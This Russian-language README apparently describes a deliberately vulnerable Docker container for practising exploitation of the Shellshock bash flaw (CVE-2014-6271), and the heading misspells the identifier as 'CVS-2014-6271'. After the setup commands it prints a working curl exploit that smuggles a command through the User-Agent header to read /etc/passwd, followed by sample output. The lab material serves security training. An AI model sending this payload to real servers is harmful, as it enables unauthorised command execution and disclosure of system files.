
Уязвимость как услуга: демонстрация CVS-2014-6271, также известной как Shellshock
Система Debian (Buster) Linux с уязвимой версией bash и веб-приложение для демонстрации CVE-2014-6271, также известного как Shellshock.
Этот docker-контейнер основан на Debian Buster и был изменён для использования уязвимой версии Bash (bash_4.2:2b:dfsg-0.1).
Веб-приложение доступно через Apache 2 и обслуживает CGI-скрипт, который выполняет команды оболочки.
Установите контейнер с помощью docker pull hmlio/vaas-cve-2014-6271
Запустите контейнер с пробросом порта docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271
Вы должны иметь возможность получить доступ к веб-приложению по адресу http://your-ip:8080/.
Веб-приложение/уязвимую версию bash можно эксплуатировать, как показано ниже:
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
Концепция и веб-приложение сильно вдохновлены VM "Sokar" с VulnHub, созданной rasta_mouse. За дополнительными подробностями обратитесь к https://www.vulnhub.com/entry/sokar-1,113/.